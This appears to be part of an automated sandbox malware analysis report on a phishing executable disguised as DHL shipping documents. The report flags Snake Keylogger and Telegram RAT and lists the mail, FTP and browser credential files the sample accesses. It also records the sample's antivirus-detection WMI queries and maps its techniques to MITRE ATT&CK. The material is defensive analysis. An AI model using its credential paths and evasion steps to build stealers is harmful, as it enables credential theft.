                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F2A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106BC59 SetUnhandledExceptionFilter,2_2_0106BC59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106BC7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0106BC7C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe protection: execute and read and writeJump to behavior
                .NET source code references suspicious native API functions
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ufffd?ufffd?ufffd/?ufffdi??.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,1_2_01079912
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: EnumSystemLocalesEx,1_2_01072C02
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0107380E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,1_2_01072C37
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_0107483A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_01072B8A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010733CD
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_01073E4A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_0106CE68
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,2_2_01079912
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_0107380E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0107483A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_01072B8A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010733CD
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: EnumSystemLocalesEx,2_2_01072C02
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,2_2_01072C37
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_01073E4A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0106CE68
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106445F cpuid 1_2_0106445F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BA43 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,1_2_0106BA43
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation                		11
                Windows Service                		1
                Access Token Manipulation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts21
                Native API                		Boot or Logon Initialization Scripts11
                Windows Service                		11
                Deobfuscate/Decode Files or Information                		LSASS Memory2
                File and Directory Discovery                		Remote Desktop Protocol2
                Data from Local System                		Exfiltration Over Bluetooth1
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts3
                Command and Scripting Interpreter                		Logon Script (Windows)111
                Process Injection                		31
                Obfuscated Files or Information                		Security Account Manager37
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts1
                Service Execution                		Logon Script (Mac)Logon Script (Mac)1
                Software Packing                		NTDS141
                Security Software Discovery                		Distributed Component Object Model1
                Clipboard Data                		Scheduled Transfer12
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Access Token Manipulation                		LSA Secrets1
                Process Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common111
                Process Injection                		Cached Domain Credentials1
                Remote System Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
